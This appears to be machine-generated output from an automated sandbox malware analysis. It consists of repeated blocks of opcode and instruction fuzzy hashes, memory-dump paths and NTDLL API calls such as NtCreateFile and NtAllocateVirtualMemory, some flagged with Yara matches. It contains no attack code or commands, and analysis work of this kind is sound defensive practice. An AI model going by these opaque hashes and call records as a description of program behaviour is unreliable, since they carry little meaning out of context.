                                                                    • Opcode Fuzzy Hash: 346e1f0a0c85ea715bb796bfcb037ea293e42c8aa07fb01ea79d1e4ea652f2b6
                                                                    • Instruction Fuzzy Hash: ED90027174100802D141719A4404606000DB7D0285F91C013A0814555ECBA58A56BAA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b3749be59288cabcd0500610a0c6cd8b562bb6623dfe123ea44d7a17c2c52b0
                                                                    • Instruction ID: c1492fdbf45fb9b49d852417cf711d56093803d9223a1b1da63a1b2d85578c1d
                                                                    • Opcode Fuzzy Hash: 3b3749be59288cabcd0500610a0c6cd8b562bb6623dfe123ea44d7a17c2c52b0
                                                                    • Instruction Fuzzy Hash: B490026170100802D102619A4414606000DE7D1389F91C013E1814556DCB758953B173
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 829f6a76dcaf9f8204071ed6e6deb29531bb3547afad05bb09c777d65ad76519
                                                                    • Instruction ID: 20c3d49ba2c5899caadeeea60ee339f9df22c0a0ceb5b44538dc72e7810743a8
                                                                    • Opcode Fuzzy Hash: 829f6a76dcaf9f8204071ed6e6deb29531bb3547afad05bb09c777d65ad76519
                                                                    • Instruction Fuzzy Hash: C290027170100803D100619A55087070009A7D0245F51D412A0814559DDBA688517162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e4fd5dac880d715dc26783600f212d64310b50a90c4c276ae72bc672811b8ab
                                                                    • Instruction ID: 2b516dab7200c74e528173f25363c04bd335d6023659fafa3830d272360b0039
                                                                    • Opcode Fuzzy Hash: 0e4fd5dac880d715dc26783600f212d64310b50a90c4c276ae72bc672811b8ab
                                                                    • Instruction Fuzzy Hash: 3B90026170504842D100659A5408A060009A7D0249F51D012A1454596DCB758851B172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91dd5444791c83aab92143f97b932b2e1d4bf256ae0e54a789460863ef5a4991
                                                                    • Instruction ID: b254d3b4e17bbfe4dcfcb0096af93b887622a275c6021b862a477aeeb67bbfc3
                                                                    • Opcode Fuzzy Hash: 91dd5444791c83aab92143f97b932b2e1d4bf256ae0e54a789460863ef5a4991
                                                                    • Instruction Fuzzy Hash: 1990027570504842D500659A5804A870009A7D0349F51D412A081459DDCBA48861B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b76bcc2b40b1a294fee28033b0916316757333874e32b5511a7979978e2ab5bc
                                                                    • Instruction ID: 255b47431eda3439c680627fdc5bb90977d8fba05e128dc5fd107f8d33c4aa15
                                                                    • Opcode Fuzzy Hash: b76bcc2b40b1a294fee28033b0916316757333874e32b5511a7979978e2ab5bc
                                                                    • Instruction Fuzzy Hash: 2890026174100C02D140719A8414707000AE7D0645F51C012A0414555DCB66896576F2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47b2d6c28baae96075764c449e2b5b7e0f2f2fe631b9be54c03941d375d70ff7
                                                                    • Instruction ID: 6fba2c5521e9cddf00836e34d825901e094783e35d84bfa05e1fc878b0c77148
                                                                    • Opcode Fuzzy Hash: 47b2d6c28baae96075764c449e2b5b7e0f2f2fe631b9be54c03941d375d70ff7
                                                                    • Instruction Fuzzy Hash: 81900271701004529500A6DA5804A4A4109A7F0345B51D016A4404555CCAA488616162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73312cc87b0854b86d6fc4c58ca32694a31b8f1477c8b0f40f566e322e3fedde
                                                                    • Instruction ID: d9f3b575456c4d485ef38eb2effb6a9e9bd7a56b47ab9f4a7b0232cd2a116b58
                                                                    • Opcode Fuzzy Hash: 73312cc87b0854b86d6fc4c58ca32694a31b8f1477c8b0f40f566e322e3fedde
                                                                    • Instruction Fuzzy Hash: 2D900261B0500802D140719A54187060019A7D0245F51D012A0414555DCBA98A5576E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80fa424175ae429e871a5131bd3b461eee6a28bb3bce4e41a5813a355ed761d2
                                                                    • Instruction ID: 5d14b78b9251cabaff119d3c54ae4679afcf18cf33fb09a0b85a0e2bc0bb987a
                                                                    • Opcode Fuzzy Hash: 80fa424175ae429e871a5131bd3b461eee6a28bb3bce4e41a5813a355ed761d2
                                                                    • Instruction Fuzzy Hash: 7B90027170144402D140719A844460B5009B7E0345F51C412E0815555CCB658856A262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c1fadcc0e36d8f7c00ab522d1f912efbd179f68cd3c0caf48c5a3f09ab21356
                                                                    • Instruction ID: ef792edf7c024c0fb351f0bb8ad8f6d5ec513934f34e5a312f96de88db5cebe0
                                                                    • Opcode Fuzzy Hash: 2c1fadcc0e36d8f7c00ab522d1f912efbd179f68cd3c0caf48c5a3f09ab21356
                                                                    • Instruction Fuzzy Hash: 7C90027170504C42D140719A4404A460019A7D0349F51C012A0454695DDB758D55B6A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d2a2415c1440b01d2027dd59dc93c4156aea07950f108eab7f6fdfd72211a167
                                                                    • Instruction ID: 3dd186cdac4a245dd74bde7b57ef713a4207e6e1c40bc3a716dec581a92e9959
                                                                    • Opcode Fuzzy Hash: d2a2415c1440b01d2027dd59dc93c4156aea07950f108eab7f6fdfd72211a167
                                                                    • Instruction Fuzzy Hash: 21900271B0500C02D150719A44147460009A7D0345F51C012A0414655DCBA58A5576E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac9389228791720dcfa3199e723f4797c30ba7ccdf058367816895e3e8ff2838
                                                                    • Instruction ID: 7f0b466027a543e0a5047672a1827a5077bd02a69c4f4a0c694a4bdaed287b10
                                                                    • Opcode Fuzzy Hash: ac9389228791720dcfa3199e723f4797c30ba7ccdf058367816895e3e8ff2838
                                                                    • Instruction Fuzzy Hash: 4E90027170140802D100619A48087470009A7D0346F51C012A5554556ECBB5C8917572
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b419149d1a325230396affc9913c516fd5c8d787c8ce766fbbee731b19d3352d
                                                                    • Instruction ID: b7abda3ea0a766ec52be8c175abc3487826bf2518b44c5421af43b887eaa9976
                                                                    • Opcode Fuzzy Hash: b419149d1a325230396affc9913c516fd5c8d787c8ce766fbbee731b19d3352d
                                                                    • Instruction Fuzzy Hash: A290027170100C42D100619A4404B460009A7E0345F51C017A0514655DCB65C8517562
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e0497066a9827c1f19f545c7d928678c0ab6a746a42e45288f1d5ab321de650
                                                                    • Instruction ID: aa14ad11b6ec66b621d68ed0ad91c0e68cad35625088db257d70100f0e1fe537
                                                                    • Opcode Fuzzy Hash: 9e0497066a9827c1f19f545c7d928678c0ab6a746a42e45288f1d5ab321de650
                                                                    • Instruction Fuzzy Hash: 7E90026170144842D140629A4804B0F4109A7E1246F91C01AA4546555CCE6588556762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 65e4faa3bc8224ad97750209c411ec2ec1cec6a8ebcf6bb0630f7dcc033264e1
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014AFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014AFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014AFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 54fb2c6185bb461cab13f5ee0d80808f6545c2e1e5a91048c78d470190d13d76
                                                                    • Instruction ID: 4574305bbc6edeeefb2068555c352acf46f933de7ab2b7fa1ab3730e71d60f3e
                                                                    • Opcode Fuzzy Hash: 54fb2c6185bb461cab13f5ee0d80808f6545c2e1e5a91048c78d470190d13d76
                                                                    • Instruction Fuzzy Hash: C2F0C8361006017BD7211A46DC05F27BF5ADB64730F25021AF628595F1E972A82096A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,027B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 027B820D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: a9f93b9354c828af976ae2f7e142a28ddd1892eb8198c0dda5be3d745ab2a8a4
                                                                    • Instruction ID: 545063c81e4cb6c173625dfe7ee1f3b3880a90b32e3e206d93858c1ee87997d9
                                                                    • Opcode Fuzzy Hash: a9f93b9354c828af976ae2f7e142a28ddd1892eb8198c0dda5be3d745ab2a8a4
                                                                    • Instruction Fuzzy Hash: D901B6B2204108AFCB08CF98DC94EEB37A9AF8C354F158648FA0DD7251D630E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,027B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 027B820D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 56eaa716f780e3cd4a9d4e2c6d370b6f42836389a639f8b6894232e5b4fe938e
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: BBF0B2B2200208ABCB08CF89DC84EEB77ADAF8C754F158648FA0D97240C630E8118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(027B3D52,5E972F59,FFFFFFFF,027B3A11,?,?,027B3D52,?,027B3A11,FFFFFFFF,5E972F59,027B3D52,?,00000000), ref: 027B82B5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: 10c9745f0b4d560d43b1e76fc187661612edb69f83708a70d80f6f6f14bd14e2
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: E3F0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158649BA1D97241DA30E8118BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027A2D11,00002000,00003000,00000004), ref: 027B83D9
Memory Dump Source
• Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 037dfc1270f110aa0378d8906236b062abd3b0417609581a499a313012f70687
• Instruction ID: 5b76654a31d8bbd14c50a738c60ef6be987df80fab23dad9e1fbcb9e3bec821a
• Opcode Fuzzy Hash: 037dfc1270f110aa0378d8906236b062abd3b0417609581a499a313012f70687
• Instruction Fuzzy Hash: EEF01CB5200118ABDB14DF89CC81EE777ADEF8C350F158649FE1997240C630E811CBA0
Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027A2D11,00002000,00003000,00000004), ref: 027B83D9
Memory Dump Source
• Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: ecbea571fa3973e3fc283ffd116125ef1da510f520de35ccd41e41bd2bd79f41
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: EEF015B2200208ABCB14DF89CC80EEB77ADAF8C750F118549FE0897241C630F810CBE0
Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(027B3D30,?,?,027B3D30,00000000,FFFFFFFF), ref: 027B8315
Memory Dump Source
• Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: e484c21c8767c3a88017d74f44b675757c46a4d1cf76f83b444d2e3a4c3ff229
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: E6D012752002146BD711EF99CC45FD7775DEF48750F154455BA185B241C530F9008AE0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
• Instruction ID: 356edf8a4880885a38f981b1f7cb51325498aa8af4b22352ec53afeccdb78dc1
• Opcode Fuzzy Hash: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
• Instruction Fuzzy Hash: 6590027124100417F12171598504B07000997E4285F91C426E041556CD9696D956B161
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
• Instruction ID: e9182d5674df18e909ebbbe354946ca3a1ddf629a08fb0611876639156d16006
• Opcode Fuzzy Hash: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
• Instruction Fuzzy Hash: E8900271282041567555B15984049074006A7F4285791C026E1405964C8566E85AF661
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
• Instruction ID: 014803386cd8810602c251efe0935cf1a4baac3dcc5d38263e231dc1db4d369a
• Opcode Fuzzy Hash: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
• Instruction Fuzzy Hash: AC900275251000072115B5594704907004697E9395351C035F1006564CD661D8657161
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
• Instruction ID: 74aa8e86e2f7bb37929717a47a70ff237d1053beaa36617bd96d71a4dd707d8a
• Opcode Fuzzy Hash: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
• Instruction Fuzzy Hash: E09002B124100406F15071598404B46000597E4345F51C025E5055568E8699DDD976A5
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
• Instruction ID: 0285e9a219eecfcee0d3d06970f113eedea83386e4e323b86394dc11226a7b31
• Opcode Fuzzy Hash: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
• Instruction Fuzzy Hash: 4D9002B124200007611571598414A16400A97F4245B51C035E10055A4DC565D8957165
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
• Instruction ID: 6eb0536df7aa76879015fc4e4c51f8e867ee5c2c6263e31910def88e0237a7e6
• Opcode Fuzzy Hash: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
• Instruction Fuzzy Hash: DB9002B138100446F11071598414F060005D7F5345F51C029E1055568D8659DC567166
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
• Instruction ID: 5584065e4659a6f654b6ed98886a48f8ed3146c547bc0abd48e41dbbb9215a97
• Opcode Fuzzy Hash: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
• Instruction Fuzzy Hash: 5590027124100806F19071598404A4A000597E5345F91C029E0016668DCA55DA5D77E1
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
• Instruction ID: d3fe303099351703a85c377f53a3ef3396e372accd24bd13159cce221aaaee8f
• Opcode Fuzzy Hash: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
• Instruction Fuzzy Hash: 7B90027124504846F15071598404E46001597E4349F51C025E00556A8D9665DD59B6A1
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
• Instruction ID: da1b5b1533e02d3d9bfbded9e282c543c35d2a227b6d9b7ee6d109a17ad8b6ea
• Opcode Fuzzy Hash: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
• Instruction Fuzzy Hash: EB90027125180046F21075698C14F07000597E4347F51C129E0145568CC955D8657561
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
• Instruction ID: edab0d42843aaa35cee782205310f3b0cd00cd190351771c6fb6a8024e779e0f
• Opcode Fuzzy Hash: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
• Instruction Fuzzy Hash: A990027124108806F1207159C404B4A000597E4345F55C425E441566CD86D5D8957161
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
• Instruction ID: 81c3fc9cf431b443248c8f45a049a5a1c52b15b03f8d4c4df705f79ba51fb8c5
• Opcode Fuzzy Hash: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
• Instruction Fuzzy Hash: 7D90027124100846F11071598404F46000597F4345F51C02AE0115668D8655D8557561
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
• Instruction ID: 0d08fb4d96013d097328c51371e05d333170b4d6e436f6c09bf41ed0021d4fc1
• Opcode Fuzzy Hash: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
• Instruction Fuzzy Hash: 9890027124100406F11075999408A46000597F4345F51D025E5015569EC6A5D8957171
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
• Instruction ID: bdcf523ae27eb52ecf403699949c1880f3aa041d7a75a4a921619b7a5b918841
• Opcode Fuzzy Hash: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
• Instruction Fuzzy Hash: 6C90027135114406F1207159C404B06000597E5245F51C425E081556CD86D5D8957162
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
• Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
• Instruction ID: b619b6b36c51970f45ae2b25bfcb1fdb726bb728d7f4f3a6b61ad7235f31f14f
• Opcode Fuzzy Hash: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
• Instruction Fuzzy Hash: 0890027925300006F19071599408A0A000597E5246F91D429E000656CCC955D86D7361
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(027B3516,?,027B3C8F,027B3C8F,?,027B3516,?,?,?,?,?,00000000,00000000,?), ref: 027B84BD
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027A3B93), ref: 027B84FD
Memory Dump Source
• Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
